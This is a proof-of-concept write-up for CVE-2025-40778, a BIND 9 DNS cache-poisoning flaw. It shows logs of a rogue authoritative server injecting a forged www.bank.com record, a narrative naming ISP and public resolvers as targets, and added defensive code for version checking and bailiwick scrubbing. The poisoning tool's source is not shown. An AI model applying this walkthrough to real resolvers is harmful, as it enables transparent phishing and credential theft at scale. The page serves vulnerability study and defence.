
CVE-2025-40778 PoC — ISC BIND 9 Security Vulnerability

Source
Associated Vulnerability
Title: ISC BIND 9 Security Vulnerability (CVE-2025-40778)
Description: ISC BIND 9 is Domain Name System software from ISC. ISC BIND 9 versions 9.11.0 through 9.16.50, 9.18.0 through 9.18.39, 9.20.0 through 9.20.13, 9.21.0 through 9.21.12, 9.11.3-S1 through 9.16.50-S1, 9.18.11-S1 through 9.18.39-S1, and 9.20.9-S1 through 9.20.13-S1 contain a security vulnerability. It stems from the server being too lenient when accepting answer records, which can allow forged data to be injected into the cache.
Description
POC CVE-2025-40778: Cache Poisoning BIND 9 👾
Readme
# CVE-2025-40778 Proof of Concept

Educational demonstration of DNS Cache Poisoning vulnerability via Additional Records injection.

## ⚠️ Disclaimer

**FOR EDUCATIONAL PURPOSES ONLY**

This tool is provided for educational and authorized security testing purposes only. Unauthorized use of this tool against systems you do not own or have explicit permission to test is illegal and unethical.

The author assumes no liability for misuse or damage caused by this tool.

## 📋 Description

This PoC demonstrates how a compromised authoritative DNS server can inject poisoned records into DNS responses, potentially redirecting users to malicious servers without their knowledge.

**Attack Vector:**
- Compromised authoritative nameserver injects additional DNS records
- Poisoned records get cached by recursive resolvers
- Users querying legitimate domains get redirected to attacker-controlled IPs
- Enables transparent phishing attacks (correct URL, malicious server)


**Possible scenarios:**

- 100% transparent phishing (correct URL)
- Bypass anti-phishing training
- Large-scale attacks against corporate networks
- Persistence (lasts hours with high TTL)
- Affects ALL applications
- MFA bypass (via transparent proxy)
- Malware distribution via updates
- And more

## 👤 Author & Contact
- Researcher: krakhen.dev
- GitHub: @nehkark
- Email: krakhen@gmail.com
- ICQ: 24298753
- Website: https://vciso.cloud

## 🔧 Requirements

```bash
pip install dnslib
pip install dnspython
pip install scapy
```

## Technical Summary CVE-2025-40778

## 🔧 Check DNS Version

Vulnerable versions of BIND 9:

- 9.11.0 – 9.16.50
- 9.18.0 – 9.18.39
- 9.20.0 – 9.20.13
- 9.21.0 – 9.21.12

```bash
(venv) krakhen@poc-linux:~/CVE-2025-40778$ dig @200.0.0.X version.bind chaos txt

; <<>> DiG 9.18.39-0ubuntu0.22.04.2-Ubuntu <<>> @200.0.0.X version.bind chaos txt
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 29000
;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 1
;; WARNING: recursion requested but not available

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
; COOKIE: 76413e932ad7f2957d8d2a5d6904bec838947bd91c40da8e (good)
;; QUESTION SECTION:
;version.bind.			CH	TXT

;; ANSWER SECTION:
version.bind.		0	CH	TXT	"9.11.4-P2-RedHat-9.11.4-26.P2.el7_9.16"

;; AUTHORITY SECTION:
version.bind.		0	CH	NS	version.bind.

;; Query time: 14 msec
;; SERVER: 200.0.0.X#53(200.0.0.X) (UDP)
;; WHEN: Fri Oct 31 10:51:04 -03 2025
;; MSG SIZE  rcvd: 134
```
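To turn the `dig` output above into a yes/no answer, here is an added example (written for this page, not code from the PoC repository) that pulls the `version.bind` TXT string out of the dig output and compares it against the affected ranges listed on this page, including the -S1 subscription ranges from the advisory text. The sample dig line is the one shown above; the function names and the range table are this example's own.

```python
import re

# Affected ranges as listed in the advisory text on this page (inclusive).
# Only major.minor.patch is compared; -Pn patch levels are ignored, and the
# subscription (-S1) editions have their own ranges.
AFFECTED_RANGES = {
    "oss": [((9, 11, 0), (9, 16, 50)), ((9, 18, 0), (9, 18, 39)),
            ((9, 20, 0), (9, 20, 13)), ((9, 21, 0), (9, 21, 12))],
    "s":   [((9, 11, 3), (9, 16, 50)), ((9, 18, 11), (9, 18, 39)),
            ((9, 20, 9), (9, 20, 13))],
}

_VERSION_RE = re.compile(r'^\s*"?(\d+)\.(\d+)\.(\d+)')
_TXT_RE = re.compile(r'^version\.bind\.\s+\d+\s+CH\s+TXT\s+"([^"]*)"', re.M)


def parse_bind_version(txt):
    """Turn a version.bind TXT string into ((major, minor, patch), edition).

    Returns None when the string does not start with a BIND 9 version, which
    is what you get when the operator has set `version` in named.conf to
    hide or replace it.
    """
    m = _VERSION_RE.match(txt)
    if not m:
        return None
    version = tuple(int(x) for x in m.groups())
    edition = "s" if re.search(r"-S\d", txt) else "oss"
    return version, edition


def is_affected(txt):
    """True/False against the listed ranges; None if the version is unreadable."""
    parsed = parse_bind_version(txt)
    if parsed is None:
        return None
    version, edition = parsed
    return any(lo <= version <= hi for lo, hi in AFFECTED_RANGES[edition])


def version_from_dig_output(text):
    """Pull the TXT rdata out of the ANSWER SECTION of `dig version.bind chaos txt`."""
    m = _TXT_RE.search(text)
    return m.group(1) if m else None


# The ANSWER SECTION lines from the dig output shown on this page.
SAMPLE_DIG_OUTPUT = """;; ANSWER SECTION:
version.bind.\t\t0\tCH\tTXT\t"9.11.4-P2-RedHat-9.11.4-26.P2.el7_9.16"
"""

if __name__ == "__main__":
    reported = version_from_dig_output(SAMPLE_DIG_OUTPUT)
    print(f"reported version: {reported}")
    print(f"in an affected range: {is_affected(reported)}")
```

Two caveats on reading the result. `version.bind` is under the operator's control (the `version` option in `named.conf` can blank it or set any text), and distributions such as Red Hat and Ubuntu backport security fixes without changing the upstream version number, so a version inside a listed range is a prompt to check the vendor's changelog, not proof that the fix is missing.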


## 🔧 Check the vulnerability in the DNS server (BIND9)

This tool checks whether the vulnerability CVE-2025-40778 can be exploited against a given DNS server.

```bash
============================================================
  CVE-2025-40778 - Forwarder Configuration Validator
============================================================

Enter DNS server IP [127.0.0.1]: 200.0.0.X
Enter domain to query [www.test.local]: www.company.com

============================================================
  CVE-2025-40778 VALIDATION - Forwarder Configuration
============================================================
  DNS Server: 200.0.0.X
  Domain:     www.company.com
============================================================

[1/3] Resolution Test for www.company.com
------------------------------------------------------------
    [✓] www.company.com → 201.0.0.X
    → Forwarder ACTIVE for www.company.com

[2/3] Additional Records Test (Poison Detection)
------------------------------------------------------------
    Answers:    2 records
    Authority:  1 records
    Additional: 2 records

    ANSWER SECTION:
    → www.company.com. 300 IN CNAME www.holding.com.
    → www.holding.com. 300 IN A 201.0.0.X

    ADDITIONAL SECTION:
    → [!] POISON?: ns.company.com. 300 IN A 200.0.0.X
    → [!] POISON?: ns2.company.com. 300 IN A 200.0.1.X

    → [!!!] MULTIPLE ANSWERS - Possible poisoning detected

[3/3] Forwarder Latency Test
------------------------------------------------------------
    Query 1: 5.63ms
    Query 2: 7.46ms
    Query 3: 6.04ms
    Query 4: 5.04ms
    Query 5: 5.69ms

    Average: 5.97ms
    → [✓] Forwarder working correctly

============================================================
  CONFIGURATION VALIDATED
============================================================
```


## 🔧 Step 1: Activate Vulnerability CVE-2025-40778

Description: In this step, you launch the malicious authoritative DNS server that simulates a compromised nameserver. The server listens on a specific IP and port (127.0.0.2:5301), ready to inject poisoned DNS records into responses. When configured, it will respond to legitimate queries for www.test.local with the correct IP address, but simultaneously inject a malicious record for www.bank.com pointing to an attacker-controlled IP. This dual-response behavior is the core of the cache poisoning attack - the vulnerable DNS resolver will cache both the legitimate answer and the poisoned record, even though only one domain was requested.


```bash
(venv) krakhen@poc-linux:~CVE-2025-40778$ python3 auth_poison.py 
============================================================
  CVE-2025-40778 PoC - poc-linux | krakhen.dev
============================================================
[*] Listening: 127.0.0.2:5301
[*] Legit:   www.test.local. → 192.168.0.136
[*] Poison:  www.bank.com. → 192.168.0.100

[✓] Running. Ctrl+C to stop.

2025-10-31 10:32:56 [DNSHandler:PoisonResolver] Request: [127.0.0.1:35319] (udp) / 'www.test.local.' (A)
[→] Query: www.test.local.
[✓] Legit: www.test.local. → 192.168.0.136
[!] POISON: www.bank.com. → 192.168.0.100
2025-10-31 10:32:56 [DNSHandler:PoisonResolver] Reply: [127.0.0.1:35319] (udp) / 'www.test.local.' (A) / RRs: A,A
```

## 🔧 Step 2: Check Compromise CVE-2025-40778

Description: Here you perform a standard DNS query through your local resolver (BIND) to verify the infrastructure is working correctly. The query for www.test.local should return the legitimate IP address (192.168.0.136) as expected. At this point, the response appears normal to the end user - there's no visible indication of compromise. However, behind the scenes, the vulnerable DNS resolver has already cached both records: the legitimate one you requested AND the poisoned record for www.bank.com that was injected in the additional section of the response. This step confirms your DNS resolver successfully communicated with the malicious authoritative server and processed its response.

```bash
(venv) krakhen@poc-linux:~/invest/CVE-2025-40778$ dig @127.0.0.1 www.test.local A

; <<>> DiG 9.18.39-0ubuntu0.22.04.2-Ubuntu <<>> @127.0.0.1 www.test.local A
; (1 server found)
;; global options: +cmd
;; Got answer:
;; WARNING: .local is reserved for Multicast DNS
;; You are currently testing what happens when an mDNS query is leaked to DNS
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 57107
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 1232
; COOKIE: 169780f6ce6781fb010000006904bd5997b99a385f650fa3 (good)
;; QUESTION SECTION:
;www.test.local.			IN	A

;; ANSWER SECTION:
www.test.local.		120	IN	A	192.168.0.136

;; Query time: 1 msec
;; SERVER: 127.0.0.1#53(127.0.0.1) (UDP)
;; WHEN: Fri Oct 31 10:44:57 -03 2025
;; MSG SIZE  rcvd: 87
```

## 🔧 Step 3: Poison DNS - CVE-2025-40778 Active

Description: This step reveals the evidence of successful cache poisoning from the attacker's perspective. The logs from the malicious DNS server show it received the query for www.test.local, responded with the legitimate answer, AND successfully injected the poison record for www.bank.com. The notation "RRs: A,A" indicates two A records were sent in the response - one legitimate, one malicious. At this moment, the victim's DNS cache is compromised. Any subsequent queries for www.bank.com from this resolver will return the attacker's IP (192.168.0.100) instead of the real banking website, enabling transparent phishing attacks where users see the correct URL but connect to a malicious server. The attack is invisible to end users and will persist until the DNS cache expires (TTL).

```bash
2025-10-31 10:39:32 [DNSHandler:PoisonResolver] Request: [127.0.0.1:35413] (udp) / 'www.test.local.' (A)
[→] Query: www.test.local.
[✓] Legit: www.test.local. → 192.168.0.136
[!] POISON: www.bank.com. → 192.168.0.100
2025-10-31 10:39:32 [DNSHandler:PoisonResolver] Reply: [127.0.0.1:35413] (udp) / 'www.test.local.' (A) / RRs: A,A
2025-10-31 10:44:57 [DNSHandler:PoisonResolver] Request: [127.0.0.1:54962] (udp) / 'www.test.local.' (A)
[→] Query: www.test.local.
[✓] Legit: www.test.local. → 192.168.0.136
[!] POISON: www.bank.com. → 192.168.0.100
2025-10-31 10:44:57 [DNSHandler:PoisonResolver] Reply: [127.0.0.1:54962] (udp) / 'www.test.local.' (A) / RRs: A,A
```
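The three steps above and the validator output in the "Check the vulnerability" section both come down to one question: which records in a response is a resolver entitled to cache? The added example below (mine, not code from the PoC repository, and a model rather than BIND's own logic) implements the classic bailiwick scrubbing rule that a resolver applies to defend against exactly this kind of injection: a record is kept only if its owner name lies inside the zone the queried nameserver is authoritative for, and an ADDITIONAL record is kept only if, on top of that, some NS/MX/SRV record in the response actually points at it. The first sample reproduces the response shape from Step 1; the second is modelled on the validator output, with the NS record in the authority section assumed (the page shows only its count) and RFC 5737 documentation addresses in place of the redacted IPs. All names and addresses are constructed.

```python
from dataclasses import dataclass, field


@dataclass(frozen=True)
class RR:
    """One resource record: owner name, TTL, type, and rdata as text."""
    name: str
    ttl: int
    rtype: str
    rdata: str


@dataclass
class Response:
    """The sections of a DNS response, as the resolver sees them."""
    qname: str
    qtype: str
    answer: list = field(default_factory=list)
    authority: list = field(default_factory=list)
    additional: list = field(default_factory=list)


@dataclass(frozen=True)
class Verdict:
    section: str
    rr: RR
    accepted: bool
    reason: str


def canon(name: str) -> str:
    """Lower-case with a single trailing dot, so comparisons are label-exact."""
    return name.lower().rstrip(".") + "."


def in_bailiwick(name: str, zone: str) -> bool:
    """True when `name` equals `zone` or is a subdomain of it (by label, not substring)."""
    name, zone = canon(name), canon(zone)
    return zone == "." or name == zone or name.endswith("." + zone)


def scrub(resp: Response, zone: str) -> list:
    """Classify every record in `resp` against the bailiwick of `zone`.

    Rules (a simplified model of resolver scrubbing, not BIND's code):
      * a record whose owner lies outside `zone` is dropped, in every section;
      * an ADDITIONAL record is kept only if it is in bailiwick AND an
        NS/MX/SRV record in the answer or authority section points at it,
        i.e. it is glue this response actually needs.
    """
    referenced = {
        canon(rr.rdata.split()[-1])
        for rr in resp.answer + resp.authority
        if rr.rtype in ("NS", "MX", "SRV")
    }
    verdicts = []
    for section, rrs in (("answer", resp.answer),
                         ("authority", resp.authority),
                         ("additional", resp.additional)):
        for rr in rrs:
            if not in_bailiwick(rr.name, zone):
                verdicts.append(Verdict(section, rr, False,
                                        f"{rr.name} is outside bailiwick {zone}"))
            elif section == "additional" and canon(rr.name) not in referenced:
                verdicts.append(Verdict(section, rr, False,
                                        f"{rr.name} is not the target of any NS/MX/SRV record"))
            else:
                verdicts.append(Verdict(section, rr, True, "in bailiwick"))
    return verdicts


def rejected_names(resp: Response, zone: str) -> list:
    """Owner names a cautious resolver refuses to cache from this response."""
    return sorted({canon(v.rr.name) for v in scrub(resp, zone) if not v.accepted})


# Constructed sample 1: the response shape described in Step 1 above.
STEP1_RESPONSE = Response(
    qname="www.test.local.", qtype="A",
    answer=[RR("www.test.local.", 120, "A", "192.168.0.136")],
    additional=[RR("www.bank.com.", 300, "A", "192.168.0.100")],
)

# Constructed sample 2: modelled on the validator output; the NS record is an
# assumption and the addresses are RFC 5737 documentation addresses.
VALIDATOR_RESPONSE = Response(
    qname="www.company.com.", qtype="A",
    answer=[RR("www.company.com.", 300, "CNAME", "www.holding.com."),
            RR("www.holding.com.", 300, "A", "198.51.100.10")],
    authority=[RR("company.com.", 300, "NS", "ns.company.com.")],
    additional=[RR("ns.company.com.", 300, "A", "192.0.2.1"),
                RR("ns2.company.com.", 300, "A", "192.0.2.2")],
)

if __name__ == "__main__":
    for label, resp, zone in (("step 1", STEP1_RESPONSE, "test.local."),
                              ("validator", VALIDATOR_RESPONSE, "company.com.")):
        print(f"== {label} (zone {zone})")
        for v in scrub(resp, zone):
            flag = "KEEP" if v.accepted else "DROP"
            print(f"  [{flag}] {v.section:<10} {v.rr.name} {v.rr.rtype} {v.rr.rdata}  ({v.reason})")
```

Run it and the Step 1 response loses `www.bank.com`, which is the whole attack. The second sample keeps `ns.company.com` (glue inside `company.com` that the NS record needs) and drops both `ns2.company.com` and the out-of-zone A record for `www.holding.com`; a resolver should obtain that address with its own query to the `holding.com` servers rather than trust the `company.com` server for it. That is the distinction the validator's `POISON?` heuristic approximates by flagging every additional record. On the monitoring side, the same classification applied to captured resolver traffic gives a direct signal: an authoritative server that keeps sending out-of-bailiwick records is either misconfigured or doing what Step 1 does.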

## 📖 Conclusion
## Real-World Attack Scenario: Understanding the Impact

What This Means in Practice:

Imagine you're a regular user trying to access your bank's website. You carefully type www.bank.com into your browser - the URL is 100% correct, no typos, no suspicious links from emails. Your browser's address bar shows the exact domain you trust. Everything looks legitimate.

But here's what actually happened behind the scenes:

Your company's DNS server was compromised by an attacker who poisoned its cache using this vulnerability. When your computer asks "Where is www.bank.com?", the poisoned DNS responds with the attacker's server IP address instead of the real bank's address.

The Anatomy of an Attack:

- ✅ You see the correct URL: https://www.bank.com
- ✅ You didn't click any suspicious email link
- ✅ You didn't download any malware
- ✅ You followed all security best practices
- ❌ But you're connecting to the attacker's fake website

What the attacker can steal:

- Login credentials - Your username and password are captured the moment you type them
- Session tokens - Even if you use two-factor authentication (2FA), the attacker can intercept your authenticated session
- Personal information - Account numbers, social security numbers, credit card details
- Business secrets - Corporate emails, confidential documents, API keys

Why it's so dangerous:

This attack is completely invisible to the victim. There's no warning, no red flags, no way for an average user to detect it. Even security-aware professionals can fall victim because the attack happens at the infrastructure level, not on the user's device. One compromised DNS server can affect thousands of users simultaneously, making it a highly effective attack vector for cybercriminals targeting organizations.

The bottom line: CVE-2025-40778 enables attackers to weaponize trust. When the very infrastructure we rely on to navigate the internet is compromised, even the most cautious users become vulnerable. This is why understanding, testing, and mitigating this vulnerability is critical for any organization's security posture.

## ⚠️ Important: Understanding the Attack Prerequisites

Critical Requirement: For this attack to succeed, the victim must be using the compromised DNS resolver. The attack doesn't directly target end users' devices - instead, it targets the DNS infrastructure that users depend on to navigate the internet.

Real-World Attack Targets:

The attacker's primary objective is to compromise DNS resolvers that serve large user bases. The most valuable targets include:

- ISP DNS Servers - When an attacker poisons an Internet Service Provider's DNS infrastructure, every customer using that ISP's default DNS settings becomes vulnerable. This could affect millions of residential and business users simultaneously.
- Corporate DNS Servers - Organizations typically run their own internal DNS servers for employees. Compromising these servers gives attackers access to an entire company's workforce, making it an attractive target for corporate espionage or data theft.
- Public WiFi Networks - Hotels, airports, cafés, and conference centers often provide DNS services to guests. A compromised public WiFi DNS can intercept credentials from business travelers and event attendees.
- Public DNS Services - While heavily protected, services like Google DNS (8.8.8.8) or Cloudflare (1.1.1.1) represent the highest-impact targets due to their massive user base.

Why This Matters:

The attack's effectiveness scales with the DNS resolver's user base. Compromise one ISP's DNS server, and you potentially compromise every customer who hasn't manually changed their DNS settings. This is why DNS security at the infrastructure level is critical - a single vulnerable resolver can create a massive attack surface affecting thousands or millions of users who trust that infrastructure to be secure.

File Snapshot

```
/data/pocs/c17813519e71d4ebce5ce294ffd54ad59a55a0ba
├── [6.7K] auth_poison.py
├── [ 15K] CVE-2025-40778.md
├── [ 13K] README.md
├── [1.1K] readme.txt
├── [  45] requirements.txt
└── [5.5K] validate_poc_forwarder.py

1 directory, 6 files
```